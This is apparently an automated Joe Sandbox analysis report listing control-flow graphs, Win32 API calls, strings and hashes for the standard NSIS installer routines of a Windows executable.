                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                      • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                                                      • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                      • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 3282139019-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                      • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                                                      • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                                                      • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                                                                                      • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                      • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,EnabledChuck,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,EnabledChuck,EnabledChuck,00000000,00000000,EnabledChuck,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00429A95,762323A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00429A95,762323A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00429A95,762323A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                                                      • String ID: EnabledChuck$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                                                                                                                                                                                                                                      • API String ID: 4286501637-2032196800
                                                                                                                                                                                                                                                                                                      • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                      • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004035C4
                                                                                                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • Inst, xrefs: 00403698
                                                                                                                                                                                                                                                                                                      • Error launching installer, xrefs: 00403603
                                                                                                                                                                                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                                                                                                                                                                                                                                                      • Null, xrefs: 004036AA
                                                                                                                                                                                                                                                                                                      • soft, xrefs: 004036A1
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                                                      • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                                                      • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                                      • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
